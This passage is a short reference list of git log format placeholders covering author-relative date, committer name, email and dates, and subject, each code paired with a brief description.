%arAuthor date, relative
%cnCommitter name
%ceCommitter email
%cdCommitter date
%crCommitter date, relative
%sSubject